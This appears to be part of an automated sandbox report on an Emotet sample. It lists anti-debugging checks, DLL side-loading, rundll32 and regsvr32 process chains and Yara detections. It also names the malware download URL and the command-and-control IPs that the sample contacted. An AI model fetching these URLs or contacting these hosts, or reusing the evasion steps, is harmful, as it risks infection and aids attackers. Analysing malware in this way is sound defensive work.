Source: regsvr32.exe, 00000008.00000002.649399940.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471413003.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471552256.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471580346.00000000005B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: regsvr32.exe, 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471413003.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471552256.00000000005DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000010.00000002.649151434.000001FBD6402000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: wget.exe, 00000002.00000002.382696287.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.649217359.000001FBD6428000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180046AFC IsDebuggerPresent, 5_2_0000000180046AFC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018003588C GetProcessHeap, 5_2_000000018003588C
Checks if the current process is being debugged
Source: C:\Windows\System32\loaddll64.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000218C SetUnhandledExceptionFilter, 5_2_000000018000218C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180001A30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0000000180001A30
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180028DE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_0000000180028DE4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180001FA4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_0000000180001FA4

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 45.55.191.130 443 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 213.239.212.5 443 Jump to behavior
DLL side loading technique detected
Source: C:\Windows\System32\loaddll64.exe Section loaded: C:\Users\user\Desktop\download\NjszMzh0ar.dll Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\wget.exe Queries volume information: C:\Users\user\Desktop\download VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 5_2_0000000180040170
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 5_2_00000001800401F4
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 5_2_00000001800402C4
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 5_2_0000000180040384
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 5_2_000000018002A3C4
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 5_2_00000001800294B8
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 5_2_0000000180029564
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 5_2_00000001800405D0
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 5_2_00000001800295EC
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 5_2_0000000180040728
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 5_2_00000001800407FC
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 5_2_0000000180040928
Source: C:\Windows\System32\regsvr32.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 5_2_000000018003FE24
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800280B0 cpuid 5_2_00000001800280B0
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000239C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_000000018000239C

Stealing of Sensitive Information
barindex
Source: Yara match File source: 00000008.00000002.649302129.0000000000578000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected Emotet
Source: Yara match File source: 5.2.regsvr32.exe.14a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.292f30b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.14a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.292f30b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.450000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ea80010000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ea80010000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.397283581.00000292F30B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.400285901.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.649181292.0000000000491000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.395347211.000001EA80041000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.395275821.000001EA80010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.400314253.00000000014D1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.649048864.0000000000450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.397309936.00000292F30E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 670809 URL: http://clotizen.dothome.co.... Startdate: 21/07/2022 Architecture: WINDOWS Score: 100 47 80.100.90.0 XS4ALL-NLAmsterdamNL Netherlands 2->47 49 74.211.2.0 TDS-ASUS United States 2->49 51 23 other IPs or domains 2->51 59 Snort IDS alert for network traffic 2->59 61 Antivirus detection for URL or domain 2->61 63 Antivirus / Scanner detection for submitted sample 2->63 65 5 other signatures 2->65 8 loaddll64.exe 1 2->8         started        11 cmd.exe 2 2->11         started        13 svchost.exe 2->13         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 69 DLL side loading technique detected 8->69 18 regsvr32.exe 5 8->18         started        22 cmd.exe 1 8->22         started        24 rundll32.exe 8->24         started        31 2 other processes 8->31 26 wget.exe 2 11->26         started        29 conhost.exe 11->29         started        55 192.168.2.1 unknown unknown 13->55 signatures6 process7 dnsIp8 39 C:\Windows\System32\...\VycaGa.dll (copy), PE32+ 18->39 dropped 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->67 33 regsvr32.exe 12 18->33         started        37 rundll32.exe 22->37         started        53 clotizen.dothome.co.kr 112.175.184.78, 49742, 80 KIXS-AS-KRKoreaTelecomKR Korea Republic of 26->53 41 C:\Users\user\Desktop\...41jszMzh0ar.dll, PE32+ 26->41 dropped file9 signatures10 process11 dnsIp12 43 213.239.212.5, 443, 49779 HETZNER-ASDE Germany 33->43 45 45.55.191.130, 443, 49776 DIGITALOCEAN-ASNUS United States 33->45 57 System process connects to network (likely due to code injection or exploit) 33->57 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
112.175.184.78
 clotizen.dothome.co.kr Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
112.194.0.0
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN true
80.100.90.0
 unknown Netherlands
3265 XS4ALL-NLAmsterdamNL true
192.3.0.0
 unknown United States
36352 AS-COLOCROSSINGUS true
74.211.2.0
 unknown United States
4181 TDS-ASUS true
45.55.191.130
 unknown United States
14061 DIGITALOCEAN-ASNUS true
213.239.212.5
 unknown Germany
24940 HETZNER-ASDE true
4.4.0.0
 unknown United States
3356 LEVEL3US true
232.3.0.0
 unknown Reserved
unknown unknown true
208.109.90.0
 unknown United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
222.94.0.0
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN true
20.4.0.0
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS true
215.219.2.0
 unknown United States
721 DNIC-ASBLK-00721-00726US true
68.211.2.0
 unknown United States
6389 BELLSOUTH-NET-BLKUS true
208.100.90.0
 unknown United States
32440 LONIUS true
16.101.90.0
 unknown United States
unknown unknown true
70.211.2.0
 unknown United States
6167 CELLCO-PARTUS true
32.4.0.0
 unknown United States
2686 ATGS-MMD-ASUS true
67.211.2.0
 unknown United States
35985 ONERINGNET-ATL-1US true
4.1.0.0
 unknown United States
3356 LEVEL3US true
36.4.0.0
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN true
236.3.0.0
 unknown Reserved
unknown unknown true
16.4.0.0
 unknown United States
unknown unknown true
96.92.0.0
 unknown United States
7922 COMCAST-7922US true
208.99.90.0
 unknown United States
30361 SWIFTWILL2US true
56.211.2.0
 unknown United States
2686 ATGS-MMD-ASUS true
72.211.2.0
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS true
16.100.90.0
 unknown United States
unknown unknown true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
clotizen.dothome.co.kr 112.175.184.78 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://45.55.191.130/ true
  • URL Reputation: safe
 unknown
https://213.239.212.5/ true
  • Avira URL Cloud: malware
 unknown
http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/ true
  • Avira URL Cloud: malware
 unknown